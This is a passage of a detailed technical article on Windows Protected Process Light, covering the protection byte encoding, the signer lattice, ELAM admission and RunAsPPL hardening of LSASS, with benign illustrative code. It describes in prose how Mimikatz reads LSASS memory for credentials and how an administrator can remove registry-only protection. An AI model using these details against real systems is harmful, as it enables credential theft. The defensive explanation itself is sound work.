The 8.1 fix is so compact it fits in a single byte. Ionescu's Part 1 of the "Evolution of Protected Processes" series, published November 22, 2013, gives the kernel structure verbatim [@ionescu-part1]:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Three fields. One byte. The union with Level:UCHAR exists so that two _PS_PROTECTION values can be compared with a single byte load and a single byte compare. The kernel does this on every NtOpenProcess. Speed matters; this is the hot path of the security model.

`_PS_PROTECTION`: The kernel structure that encodes a process's protection state in eight bits: three bits of Type (`None`, `ProtectedLight`, `Protected`), one bit of Audit (intended as a forensic side-channel hint, although the exact runtime semantics are not enumerated in the public sources cited here), and four bits of Signer rung. Stored as `EPROCESS.Protection`.

The Type field has three values. PsProtectedTypeNone = 0 marks a regular process. PsProtectedTypeProtectedLight = 1 marks a PPL -- the graduated path introduced in 8.1. PsProtectedTypeProtected = 2 marks a "heavy" Vista-style PP. Heavy PPs still exist; they retain the original DRM semantics where almost nothing from below the protection level may touch them. PPLs are the new general-purpose path where the signer rung mediates a graduated lattice.

The Audit bit is the least documented of the three fields. Ionescu Part 1 lists it as Audit : Pos 3, 1 Bit with no semantic gloss; itm4n's RunAsPPL header annotates it as // Reserved; Microsoft Learn enumerates CodeIntegrity events 3033, 3063, 3065, and 3066, but those are triggered by the AuditLevel configuration under Image File Execution Options\LSASS.exe and concern DLL-load failures, not per-process OpenProcess denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field's name implies a forensic side-channel, and the bit-position is reserved; the precise runtime emission shape is not enumerated in the public sources cited here.

The Signer field is the structurally interesting one. Ionescu's 2013 enumeration names eight values [@ionescu-part1]:

Signer constant	Value	Used for
`PsProtectedSignerNone`	0	Non-protected (no rung)
`PsProtectedSignerAuthenticode`	1	Generic third-party Authenticode (early PPL guests)
`PsProtectedSignerCodeGen`	2	.NET native runtime code generators
`PsProtectedSignerAntimalware`	3	EDR / AV daemons admitted via ELAM
`PsProtectedSignerLsa`	4	`lsass.exe` under `RunAsPPL`
`PsProtectedSignerWindows`	5	Microsoft Windows components below TCB
`PsProtectedSignerWinTcb`	6	`csrss.exe`, `smss.exe`, `services.exe` -- the inbox TCB
`PsProtectedSignerMax`	7	Sentinel value (enumeration upper bound)

Note: Ionescu's 2013 list is the authoritative baseline enumeration. It is not a permanent enumeration. By 2018, James Forshaw's PowerShell tooling (NtApiDotNet) was enumerating an additional App = 8 signer used for AppContainer / TruePlay scenarios [@forshaw-2018-10]. Newer builds of Windows extend the enumeration further. The article will name WinTcb (Microsoft's documented inbox-TCB rung) and Antimalware (the only non-Microsoft-admissible rung) repeatedly, because they are the load-bearing ones. The intermediate values evolve.

Adjacent to EPROCESS.Protection are two related fields, EPROCESS.SignatureLevel and EPROCESS.SectionSignatureLevel, which Ionescu introduces in Part 3 [@ionescu-part3]. These fields encode the binary integrity the kernel demands at process creation and at every subsequent section load, and they are filled in from a 16-entry Signing Level table that runs from Unchecked = 0 up to Windows TCB = 14. The Signer rung in Protection answers "what kind of trust does this process hold?" The SignatureLevel pair answers "what binaries is this process allowed to map?" They are not the same question.

Now the worked decode. Given the byte value 0x41, the encoding falls out by hand:

Low three bits (Type): 0x41 & 0x07 = 0x01 -- PsProtectedTypeProtectedLight.
Bit 3 (Audit): (0x41 >> 3) & 0x01 = 0 -- Audit off.
High four bits (Signer): (0x41 >> 4) & 0x0F = 0x04 -- PsProtectedSignerLsa.

A process with EPROCESS.Protection = 0x41 is a PPL signed at the Lsa rung. That is exactly what lsass.exe looks like on a host with RunAsPPL = 1. Ionescu's blog explicitly states: "it's easy to read 0x41 as Lsa (0x4) + PPL (0x1)" [@ionescu-part1]. The Defender service MsMpEng.exe, signed at the Antimalware rung, has Protection = 0x31. The Client/Server Runtime Subsystem process csrss.exe, signed at WinTcb, has Protection = 0x61.

flowchart TD
    B[byte: 8 bits]
    B --> F1[bits 0..2: Type]
    B --> F2[bit 3: Audit]
    B --> F3[bits 4..7: Signer]
    F1 --> T0[0 = None]
    F1 --> T1[1 = ProtectedLight PPL]
    F1 --> T2[2 = Protected PP]
    F3 --> S0[0 None]
    F3 --> S1[1 Authenticode]
    F3 --> S2[2 CodeGen]
    F3 --> S3[3 Antimalware]
    F3 --> S4[4 Lsa]
    F3 --> S5[5 Windows]
    F3 --> S6[6 WinTcb]

{`
function decodeProtection(byteValue) {
  const type = byteValue & 0x07;          // low three bits
  const audit = (byteValue >> 3) & 0x01;  // bit 3
  const signer = (byteValue >> 4) & 0x0F; // high four bits
  const typeNames = ['None', 'ProtectedLight', 'Protected'];
  const signerNames = [
    'None', 'Authenticode', 'CodeGen', 'Antimalware',
    'Lsa', 'Windows', 'WinTcb', 'Max'
  ];
  return {
    raw: '0x' + byteValue.toString(16).padStart(2, '0'),
    type: typeNames[type] || 'unknown(' + type + ')',
    audit: audit ? 'on' : 'off',
    signer: signerNames[signer] || 'unknown(' + signer + ')'
  };
}

// Worked examples from real Windows processes
console.log('MsMpEng.exe (Defender):', decodeProtection(0x31));
console.log('lsass.exe under RunAsPPL:', decodeProtection(0x41));
console.log('csrss.exe (WinTcb):', decodeProtection(0x61));
`}
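The decode also runs in reverse. As a minimal sketch (the helper name `encodeProtection` and the constant tables are illustrative, with values taken from the Type and Signer enumerations above), packing the three fields back into a byte reproduces the values quoted for `lsass.exe`, `MsMpEng.exe`, and `csrss.exe`:

```javascript
// Sketch: pack Type (3 bits), Audit (1 bit), and Signer (4 bits) into one byte.
// encodeProtection is an illustrative helper, not a Windows API.
const PROTECTION_TYPE = { None: 0, ProtectedLight: 1, Protected: 2 };
const PROTECTION_SIGNER = {
  None: 0, Authenticode: 1, CodeGen: 2, Antimalware: 3,
  Lsa: 4, Windows: 5, WinTcb: 6,
};

function encodeProtection(type, audit, signer) {
  if (!Number.isInteger(type) || type < 0 || type > 7) {
    throw new RangeError('type must fit in 3 bits');
  }
  if (!Number.isInteger(signer) || signer < 0 || signer > 15) {
    throw new RangeError('signer must fit in 4 bits');
  }
  return (signer << 4) | ((audit ? 1 : 0) << 3) | type;
}

function hex(byteValue) {
  return '0x' + byteValue.toString(16).padStart(2, '0');
}

console.log('PPL / Lsa:        ',
  hex(encodeProtection(PROTECTION_TYPE.ProtectedLight, false, PROTECTION_SIGNER.Lsa)));
console.log('PPL / Antimalware:',
  hex(encodeProtection(PROTECTION_TYPE.ProtectedLight, false, PROTECTION_SIGNER.Antimalware)));
console.log('PPL / WinTcb:     ',
  hex(encodeProtection(PROTECTION_TYPE.ProtectedLight, false, PROTECTION_SIGNER.WinTcb)));
```

The range checks reflect the field widths only; they say nothing about which combinations a given Windows build actually assigns.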

Note: One byte, three fields, eight signer rungs. The kernel reads it on every OpenProcess, before any token check, before any ACL evaluation. The encoding is the entire vocabulary the kernel has for asking how trusted a process is.

The encoding tells the kernel what kind of trust a process holds. It says nothing about who can touch whom across rungs. That rule -- the lattice -- is the structure imposed on top of the bytes. The next section is the lattice.

4. The Signer Lattice -- Who Can Open Whom

itm4n's 2021 walkthrough states the three rules verbatim, and they have the rare quality of being short enough to memorise [@itm4n-scrt]:

A PP can open a PP or a PPL with full access if its signer type is greater or equal. A PPL can open a PPL with full access if its signer type is greater or equal. A PPL cannot open a PP with full access, regardless of its signer type.

Three rules. They settle every cross-process access question PPL gates. Let us name them and then read off their consequences.

Rule 1. A PP at signer $S_c$ may open with full access a PP or PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 2. A PPL at signer $S_c$ may open with full access a PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 3. A PPL cannot open a PP with full access, regardless of signer.

The qualifier "with full access" is load-bearing. PPL's lattice gates the full mask -- PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_ALL_ACCESS. A separate limited mask (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_SUSPEND_RESUME, and -- for targets at the Authenticode, CodeGen, and Windows rungs -- PROCESS_TERMINATE) is allowed when the security descriptor permits. The target's rung matters. Ionescu's verbatim RtlProtectedAccess[] table widens the deny mask from 0xFC7FE to 0xFC7FF at the Antimalware, Lsa, and WinTcb rungs -- one extra bit, bit 0, which is PROCESS_TERMINATE [@ionescu-part2]. So an administrator can still call OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...) against a protected lsass.exe to query basic process information, but cannot terminate a PPL/Antimalware, PPL/Lsa, or PPL/WinTcb daemon via a direct kill. The lattice does not lock the process; it locks the interesting access, and for the top-tier rungs it also locks the kill.
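The deny-mask arithmetic can be checked by hand. A minimal sketch, assuming the `PROCESS_*` values from the public Windows SDK headers and the two deny-mask values quoted from Ionescu above; the constant and function names are illustrative, not kernel symbols.

```javascript
// Access-right values as defined in the Windows SDK (winnt.h).
const PROCESS_RIGHTS = {
  PROCESS_TERMINATE: 0x0001,
  PROCESS_CREATE_THREAD: 0x0002,
  PROCESS_VM_OPERATION: 0x0008,
  PROCESS_VM_READ: 0x0010,
  PROCESS_VM_WRITE: 0x0020,
  PROCESS_DUP_HANDLE: 0x0040,
  PROCESS_QUERY_INFORMATION: 0x0400,
  PROCESS_SUSPEND_RESUME: 0x0800,
  PROCESS_QUERY_LIMITED_INFORMATION: 0x1000,
  PROCESS_SET_LIMITED_INFORMATION: 0x2000,
  SYNCHRONIZE: 0x100000,
};

// Deny masks as quoted in the text.
const DENY_MASK_BASE = 0xFC7FE;     // Authenticode, CodeGen, Windows targets
const DENY_MASK_TOP_TIER = 0xFC7FF; // Antimalware, Lsa, WinTcb targets

// Names of the rights that a given deny mask leaves untouched.
function rightsOutsideDenyMask(denyMask) {
  return Object.keys(PROCESS_RIGHTS)
    .filter((name) => (PROCESS_RIGHTS[name] & denyMask) === 0);
}

console.log('base:', rightsOutsideDenyMask(DENY_MASK_BASE));
console.log('top tier:', rightsOutsideDenyMask(DENY_MASK_TOP_TIER));
console.log('difference bit:', '0x' + (DENY_MASK_BASE ^ DENY_MASK_TOP_TIER).toString(16));
```

The base mask leaves five rights ungated (terminate, suspend/resume, the two limited-information rights, and SYNCHRONIZE). The top-tier mask leaves the same set minus PROCESS_TERMINATE, and the XOR of the two masks is exactly 0x1.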

Caller signer \ Target signer	None	Authenticode (1)	Antimalware (3)	Lsa (4)	Windows (5)	WinTcb (6)
None (admin, integrity SYSTEM)	full	denied	denied	denied	denied	denied
PPL/Authenticode (1)	full	full	denied	denied	denied	denied
PPL/Antimalware (3)	full	full	full	denied	denied	denied
PPL/Lsa (4)	full	full	full	full	denied	denied
PPL/Windows (5)	full	full	full	full	full	denied
PPL/WinTcb (6)	full	full	full	full	full	full

Where "denied" means the full mask is rejected; the limited mask continues to apply per the target's security descriptor.
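The three rules fit in a few lines of code. The sketch below follows the numeric "greater or equal" reading quoted from itm4n; the real `RtlProtectedAccess[]` table may encode dominance differently, so treat this as a model of the rules as stated here, not of the kernel table. All names are illustrative.

```javascript
const TYPE = { None: 0, ProtectedLight: 1, Protected: 2 };
const SIGNER = {
  None: 0, Authenticode: 1, CodeGen: 2, Antimalware: 3,
  Lsa: 4, Windows: 5, WinTcb: 6,
};

// True when the caller may open the target with the full access mask.
function canOpenWithFullAccess(caller, target) {
  // Unprotected targets are not gated by the lattice at all.
  if (target.type === TYPE.None) return true;
  // A caller with no protection holds no rung.
  if (caller.type === TYPE.None) return false;
  // Rule 3: a PPL never gets full access to a PP.
  if (caller.type === TYPE.ProtectedLight && target.type === TYPE.Protected) {
    return false;
  }
  // Rules 1 and 2: signer must be greater or equal.
  return caller.signer >= target.signer;
}

const admin = { type: TYPE.None, signer: SIGNER.None };
const ppl = (signer) => ({ type: TYPE.ProtectedLight, signer });
const pp = (signer) => ({ type: TYPE.Protected, signer });

console.log(canOpenWithFullAccess(admin, ppl(SIGNER.Lsa)));                   // false
console.log(canOpenWithFullAccess(ppl(SIGNER.Antimalware), ppl(SIGNER.Lsa))); // false
console.log(canOpenWithFullAccess(ppl(SIGNER.WinTcb), ppl(SIGNER.Lsa)));      // true
console.log(canOpenWithFullAccess(ppl(SIGNER.WinTcb), pp(SIGNER.Authenticode))); // false (Rule 3)
console.log(canOpenWithFullAccess(pp(SIGNER.Authenticode), ppl(SIGNER.Authenticode))); // true (Rule 1)
```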

flowchart BT
    None[None / unprotected]
    Auth[Authenticode]
    CG[CodeGen]
    AM[Antimalware]
    Lsa[Lsa]
    Win[Windows]
    Tcb[WinTcb]
    None --> Auth
    Auth --> CG
    CG --> AM
    AM --> Lsa
    Lsa --> Win
    Win --> Tcb

The Enhanced Key Usage side of the design holds the lattice together. Microsoft's EKU OID arc 1.3.6.1.4.1.311.10.3.* defines sub-OIDs per signer rung [@iana-pen311] [@oid-base-eku-arc], and at process creation the kernel parses the main image's Authenticode signature and walks its EKU extensions to determine which rung the binary is entitled to claim. If the certificate chain resolves cleanly to a Microsoft-issued root and carries the rung's sub-OID, the kernel records the rung. Otherwise the process either starts unprotected or refuses to start at all.

Enhanced Key Usage (EKU): An X.509 v3 certificate extension that asserts what specific purposes a certificate is allowed to certify. Microsoft uses sub-OIDs under `1.3.6.1.4.1.311.10.3.*` to encode protected-process signer rungs as EKU values [@iana-pen311] [@oid-base-eku-arc]. The kernel checks the EKU at process creation; the certificate chain anchors which Microsoft-issued sub-CA may issue at each rung.

The IANA Private Enterprise Number `311` is registered to Microsoft under the PEN prefix `1.3.6.1.4.1.` [@iana-pen311], so `1.3.6.1.4.1.311.*` is the catch-all namespace for Microsoft-specific X.509 extensions; the `10.3.*` arc within it is the Microsoft Enhanced Key Usage (purpose) sub-tree [@oid-base-eku-arc], and `10.3.` slots map to specific signer purposes including protected-process rungs.

The most important property of this design is the resolution point. The kernel parses the EKU exactly once, at NtCreateUserProcess. It stores the resulting rung in EPROCESS.Protection. On every subsequent OpenProcess against that process, the kernel consults the byte, not the certificate. This makes the access check fast (one byte load, one byte compare) and decouples policy at runtime from policy at signing time. It also creates the structural seam that every public bypass since 2018 has exploited, because the kernel's confidence in the byte is exactly the confidence it had in the certificate at process-create time, projected forward indefinitely.

Ionescu's Part 2 names the implementation directly. The lattice is not code; it is a data table named RtlProtectedAccess[] baked into ntoskrnl.exe [@ionescu-part2]. Each row of that table corresponds to a (signer, target-type) pair and encodes which access bits are allowed in the full mask. The relevant runtime routines are PspProcessOpen and PspThreadOpen (the object-manager open callbacks), PspCheckForInvalidAccessByProtection (which performs the check), RtlTestProtectedAccess (which applies the lattice row), and RtlValidProtectionLevel (which sanity-checks the encoded byte for consistency).

Note: The decision of who can touch whom is encoded in a table inside ntoskrnl.exe. Changing the lattice means changing a table; widening or narrowing it does not require new code. This is why Microsoft can add App = 8 to the enumeration over time without touching the access-check routine.

Note one symmetry that becomes important later. "Greater or equal" means that within a rung, every PPL can read every other PPL. Two co-resident PPL/Antimalware daemons -- Microsoft Defender's MsMpEng.exe and a third-party EDR's agent -- can open each other with PROCESS_VM_READ. Within-rung peers leak to each other by design. The lattice prevents escalation, not peer access.

The lattice settles the rule. The next question is admission: who decides which binaries are allowed to claim the Antimalware rung, and how does Microsoft admit third-party code into it at all? The answer is a driver.

5. The Antimalware Rung -- ELAM and Third-Party Code at PPL

PPL is interesting only if it admits non-Microsoft code at some rung. The Vista PP design admitted nobody; it required a Microsoft PMP root certificate, full stop. PPL inherited that constraint at every rung except one. The Antimalware rung -- signer value 3 -- is the only rung where third-party vendors can ship their own user-mode binaries as protected processes. The admission mechanism is the Early Launch Anti-Malware driver.

Early Launch Anti-Malware (ELAM) driver: A specially signed Microsoft-certified kernel driver shipped by an anti-malware vendor that loads before any other boot-start driver. The ELAM driver participates in trusted-boot measurement, vouches for follow-on drivers, and -- critical to PPL -- carries an embedded resource section enumerating the vendor's user-mode signing certificate hashes. The kernel uses that resource section to admit the vendor's user-mode daemon binaries to `PPL/Antimalware` at service start.

Microsoft Learn's "Protecting Anti-Malware Services" page describes the boot-time admission flow in two sentences [@learn-am-services]:

The driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries. During the boot process, this resource section will be extracted from the ELAM driver to validate the certificate information and register the anti-malware service.

Two consequences. First, the third-party signer set is bounded by a kernel-readable resource section, not by an open EKU. Microsoft, not the vendor, controls which user-mode binaries are admissible. Second, the certificate hashes are baked into the driver at signing time and re-validated at every service start. A vendor cannot widen the admissible set after the fact; an attacker cannot drop in their own user-mode binary unless its hash is already listed.

The gate that decides which vendors get ELAM drivers in the first place is the Microsoft Virus Initiative. Microsoft Learn's MVI criteria page enumerates the requirement explicitly [@learn-mvi]:

Your security solution must be certified within the last 12 months by at least one of the organizations listed below: AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, West Coast Labs.

The same page requires "use of Trusted Signing," Microsoft's cloud-managed code signing service. The implications are operational. To ship code at PPL/Antimalware, a vendor must (a) hold MVI membership, (b) maintain independent-lab certification, (c) author an ELAM driver, (d) get the driver through Microsoft WHQL and have it Microsoft co-signed, and (e) embed the user-mode certificate hashes in the driver's resource section.

Microsoft Virus Initiative (MVI): A Microsoft program for anti-malware vendors that gates access to ELAM driver signing and to specific Defender APIs. Membership requires independent-lab certification (renewed annually) and Trusted Signing usage; in practical terms, MVI membership is the entry ticket to deploying user-mode binaries at `PPL/Antimalware`.

The implication of MVI is that an indie security tool, however technically sound, cannot deploy as `PPL/Antimalware`. The gate is not technical but commercial: independent-lab certification fees, annual renewals, and the engineering investment of building a production-grade ELAM driver. The signer rung is *signed*; the signing program is *gated*.

sequenceDiagram
    participant BM as Boot manager
    participant K as Windows kernel
    participant ELAM as Vendor ELAM driver (.sys)
    participant SCM as Service Control Manager
    participant CI as ci.dll (CodeIntegrity)
    participant Svc as Vendor service (e.g. EDR daemon)
    BM->>K: load boot drivers
    K->>ELAM: load ELAM driver early
    K->>ELAM: read embedded ELAM resource section
    K->>K: cache vendor user-mode cert hashes
    Note over K,SCM: Boot continues, OS initialises
    SCM->>Svc: start vendor service
    Svc->>CI: validate service binary signature
    CI->>K: lookup vendor cert against cached hashes
    K-->>CI: match -- admit at PPL/Antimalware
    CI-->>Svc: launch as PPL/Antimalware (Protection = 0x31)

By 2024, every major commercial EDR ships through this path. Microsoft Defender's MsMpEng.exe uses the inbox WdBoot.sys ELAM driver. (WdBoot.sys, the "Windows Defender Boot Driver", is Microsoft's inbox first-party ELAM driver; it ships in every Windows install and is loaded before any third-party ELAM driver. The canonical reference implementation of the ELAM resource-section pattern is Microsoft's Windows-driver-samples/security/elam repository [@ms-elam-sample], which also documents the Early Launch EKU 1.3.6.1.4.1.311.61.4.1 verbatim.) Third-party members of Microsoft's Virus Initiative -- the cohort gated by the MVI criteria quoted above [@learn-mvi] -- ship their own vendor ELAM drivers and run their main user-mode daemons at PPL/Antimalware. Microsoft Learn's "Early Launch Antimalware" page is the canonical confirmation [@learn-elam]:

Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger.

One Microsoft-signed sentence and a billion endpoints. EDR vendors get protection against administrator-level tampering for free, on top of the kernel telemetry their drivers already collect. Microsoft gets a viable third-party security market without widening the EKU gates beyond a controllable set of vendors.

ELAM admits the daemon. The next operational question is what Microsoft does for lsass.exe itself -- the canonical credential store, the original Mimikatz target. The mechanism is called RunAsPPL.

6. RunAsPPL -- Hardening LSASS

The registry value that produced the Mimikatz failure in Section 1 is a single DWORD. itm4n's walkthrough names it verbatim [@itm4n-runasppl]:

Open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot.

After reboot, lsass.exe launches at PPL/Lsa, signer rung 4, protection byte 0x41. Mimikatz running with full SYSTEM-integrity and SeDebugPrivilege then receives 0x00000005 on OpenProcess(PROCESS_VM_READ, lsass.exe). The registry knob is one DWORD; the consequences are large.

Local Security Authority Subsystem Service (LSASS): The Windows user-mode process that holds NTLM password hashes, Kerberos Ticket Granting Tickets, MSV1_0 credential caches, DPAPI master keys, and (on legacy builds before Microsoft's 2014 KB2871997 update [@ms-kb2871997]) WDigest plaintext passwords. The canonical target of credential-theft tooling since 2011.

The threat being mitigated is simple. Mimikatz reads LSASS memory via OpenProcess(PROCESS_VM_READ, lsass.exe), walks the internal key-store structures, and extracts NTLM hashes, Kerberos session keys, and (on older configurations) cached plaintext. Restricting SeDebugPrivilege does not work, because an attacker with SYSTEM has every privilege. Restricting the security descriptor on lsass.exe does not work either, because legitimate services need to interact with it. PPL is the right primitive: it gates the full mask irrespective of token state, and the kernel admits only Microsoft-signed code into the Lsa rung.

RunAsPPL = 1 is the stronger form of the setting on Secure Boot-capable machines. On the next boot, the kernel automatically mirrors the policy into a Secure Boot-anchored UEFI variable; once set, the protection survives registry rollback. An attacker who removes the registry key finds that LSASS still launches as PPL on the next boot. The only path to remove the protection is to disable Secure Boot at the firmware level, which requires physical access and which trips other defences. Microsoft Learn's documentation describes it verbatim [@learn-runasppl]:

You can achieve further protection when you use Unified Extensible Firmware Interface (UEFI) lock and Secure Boot. When these settings are enabled, disabling the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa registry key has no effect.

This is RunAsPPL = 1. For environments that need admin-removable protection without the UEFI lock, RunAsPPL = 2 (available on Win11 22H2 and later) omits the UEFI variable. The policy lives in the registry only and is removable by any administrator (or by malware running as administrator) who simply deletes the registry value before reboot.

`RunAsPPL` value	Behaviour	Removable by?	Persistence
`0` (or absent)	LSASS runs unprotected	n/a	none
`1`	LSASS runs as PPL/Lsa; policy mirrored to UEFI variable on Secure Boot machines	Physical access + Secure Boot disable	Firmware-anchored
`2`	LSASS runs as PPL/Lsa; registry only (Win11 22H2+ only)	Any admin who deletes the key	Registry only

Note: The RunAsPPL = 1 setting is the practical answer to "what stops an attacker who is willing to reboot?" Once the UEFI variable is set, neither registry rollback nor PE-based offline attacks on the registry hive can disable LSA protection on the next boot.

The deployment cost of RunAsPPL is compatibility with third-party authentication modules. LSASS hosts a set of plug-ins: smart-card middleware, third-party Cryptographic Service Providers (CSPs), password-filter DLLs, alternative authentication packages. Under RunAsPPL, the kernel demands that every DLL loaded into LSASS be Microsoft-signed at the LSA level (signer rung 4). Vendor DLLs that lack the right EKU are rejected at section creation. The rejections surface as events in the CodeIntegrity operational log (Applications and Services Logs > Microsoft > Windows > CodeIntegrity > Operational). Microsoft Learn enumerates the two relevant event IDs [@learn-runasppl]:

Event 3065 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the security requirements for shared sections.

Event 3066 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the Microsoft signing level requirements.

This is why Microsoft recommends running the setting in audit mode before enforcement. Audit mode is enabled by setting a separate AuditLevel DWORD to 8, but -- critically -- under a different registry key from the one that hosts RunAsPPL. Microsoft Learn places AuditLevel under the Image File Execution Options hive for LSASS.exe and names the path verbatim [@learn-runasppl]:

Open the Registry Editor, or enter RegEdit.exe in the Run dialog, and then go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe registry key. Open the AuditLevel value. Set its data type to dword and its data value to 00000008.

Note: RunAsPPL sits under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. AuditLevel = 8 sits under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe. A defender who edits "the same key" silently sets the wrong value and audit mode never engages. The deployment looks correct from the registry; the log surface is empty; the rollout breaks production on enforcement day. Two values. Two hives. Read this twice.
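One way to avoid the wrong-key mistake is to generate both commands from named constants and never type the paths by hand. The sketch below builds `reg add` command lines for the two values using the paths quoted above. `regAddDword` and `lsaProtectionCommands` are hypothetical helper names; the script only prints the commands and does not touch the registry.

```javascript
// The two keys named in the text. They live in different hives.
const LSA_KEY = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa';
const IFEO_LSASS_KEY =
  'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\' +
  'Image File Execution Options\\LSASS.exe';

// Build a reg.exe command that writes one REG_DWORD value.
function regAddDword(key, valueName, data) {
  return `reg add "${key}" /v ${valueName} /t REG_DWORD /d ${data} /f`;
}

// Audit mode and enforcement are separate values under separate keys.
function lsaProtectionCommands(runAsPplValue) {
  return {
    audit: regAddDword(IFEO_LSASS_KEY, 'AuditLevel', 8),
    enforce: regAddDword(LSA_KEY, 'RunAsPPL', runAsPplValue),
  };
}

const lsaCommands = lsaProtectionCommands(1);
console.log('Audit first: ', lsaCommands.audit);
console.log('Enforce later:', lsaCommands.enforce);
```

Keeping the two paths as separate constants makes the "two values, two hives" rule visible in code review.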

In audit mode, the kernel emits the same 3065 / 3066 events for would-be load rejections but allows the loads to proceed. Two months of audit-mode telemetry typically surfaces every smart-card middleware DLL, every password-filter, every third-party CSP on a corporate fleet. Once the audit log is clean (every vendor's modules have been re-signed at the LSA level or replaced), enforcement mode can be turned on without breaking production logins.
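Turning that telemetry into a remediation list is a grouping exercise. The sketch below assumes the audit events have already been exported into plain objects with an `id` and an `imagePath` field; that record shape, the sample paths, and the function name are all hypothetical, chosen only to illustrate the triage step.

```javascript
// Group 3065 / 3066 audit events by the module that triggered them.
// The { id, imagePath } record shape is an assumption for illustration.
function summariseAuditEvents(events) {
  const byModule = new Map();
  for (const ev of events) {
    if (ev.id !== 3065 && ev.id !== 3066) continue; // ignore unrelated events
    const key = ev.imagePath.toLowerCase();         // Windows paths are case-insensitive
    const entry = byModule.get(key) ||
      { imagePath: ev.imagePath, count: 0, eventIds: new Set() };
    entry.count += 1;
    entry.eventIds.add(ev.id);
    byModule.set(key, entry);
  }
  // Noisiest modules first: these are the vendors to chase before enforcement.
  return [...byModule.values()].sort((a, b) => b.count - a.count);
}

// Made-up sample data; the DLL names are placeholders, not real products.
const sampleAuditEvents = [
  { id: 3066, imagePath: 'C:\\Program Files\\ExampleVendor\\scmiddleware.dll' },
  { id: 3066, imagePath: 'c:\\program files\\examplevendor\\SCMIDDLEWARE.DLL' },
  { id: 3065, imagePath: 'C:\\Windows\\System32\\examplefilter.dll' },
  { id: 3033, imagePath: 'C:\\Windows\\System32\\other.dll' },
];

for (const row of summariseAuditEvents(sampleAuditEvents)) {
  console.log(row.count, [...row.eventIds].join('/'), row.imagePath);
}
```

An empty result over a representative audit window is the signal that enforcement can be turned on.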

Note: Skipping audit mode is the most common cause of LSA protection rollouts being rolled back after a wave of authentication failures. See §11 Item 1 for the full audit-then-enforce-then-UEFI-lock recipe.

The deployment cadence has been deliberately glacial. RunAsPPL shipped in Windows 8.1 in October 2013 -- opt-in. It remained opt-in for nine years. Microsoft Learn records the inflection [@learn-runasppl]:

Audit mode for added LSA protection is enabled by default on devices running Windows 11 version 22H2 and later.

Audit mode default-on. Not enforcement. The Windows 11 24H2 release expanded the audit-mode rollout further. Eleven years from opt-in to effective default. The pace reflects the compatibility risk: every domain with a single non-Microsoft-signed LSASS plug-in would have surfaced as a support call.

The registry knob is simple. The kernel check that enforces it is not. The next section walks the access-check pipeline in detail, because the structural reason SeDebugPrivilege cannot help an attacker is the order in which the kernel asks its questions.

7. The Kernel Access Check -- What Happens Inside `NtOpenProcess`

Recall the trace from Section 1. The denial happens before SeAccessCheck runs. The reason SeDebugPrivilege does not help is not that the kernel decided to override the privilege; it is that the kernel never asked about the privilege. The order matters. Let us walk it.

The Win32 caller invokes OpenProcess, which thunks through kernel32.dll and ntdll.dll to the NtOpenProcess system call. NtOpenProcess resolves the target process object and dispatches to the process-type object-manager open callback, PspProcessOpen. Ionescu's Part 2 names the path verbatim [@ionescu-part2]:

Access to protected processes (and their threads) is gated by the PspProcessOpen and PspThreadOpen object manager callback routines, which perform two checks. The first, done by calling PspCheckForInvalidAccessByProtection (which in turn calls RtlTestProtectedAccess and RtlValidProtectionLevel) ...

PspCheckForInvalidAccessByProtection does two things. First, it splits the caller's requested access mask into two subsets:

The limited mask -- a fixed set of bits (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, and a small handful of others) that the lattice never forbids. The limited mask is subject only to the standard SeAccessCheck against the target's DACL.
The full mask -- everything else, including PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, and PROCESS_ALL_ACCESS. The full mask is subject to the lattice rule.

Limited mask: The subset of `PROCESS_*` access rights that the PPL lattice always allows the standard `SeAccessCheck` to evaluate. Includes `SYNCHRONIZE`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SET_LIMITED_INFORMATION`, and `PROCESS_SUSPEND_RESUME`. `PROCESS_TERMINATE` is included when the target sits at the `Authenticode`, `CodeGen`, or `Windows` rung (deny mask `0xFC7FE`), but the kernel widens the deny mask to `0xFC7FF` for targets at the `Antimalware`, `Lsa`, and `WinTcb` rungs -- bit 0, `PROCESS_TERMINATE` -- making those three rungs unkillable except from peers or higher.

Second, it indexes into RtlProtectedAccess[] using the caller's signer rung and the target's type, retrieves the row of permissible access bits, and ANDs the row with the full mask. If the result is non-empty, the access proceeds; if the result is zero, the kernel strips the full-mask bits from the request and returns either the limited subset (if the caller asked for any limited bits) or STATUS_ACCESS_DENIED. RtlValidProtectionLevel runs alongside as a sanity check on the encoded byte to catch malformed EPROCESS.Protection values that would otherwise let the lattice walk off the end of the table.

sequenceDiagram
    participant App as Caller (any token)
    participant Nt as NtOpenProcess
    participant PsPO as PspProcessOpen
    participant Chk as PspCheckForInvalidAccessByProtection
    participant Rtl as RtlTestProtectedAccess + RtlValidProtectionLevel
    participant Tab as RtlProtectedAccess[] table
    participant SAC as SeAccessCheck
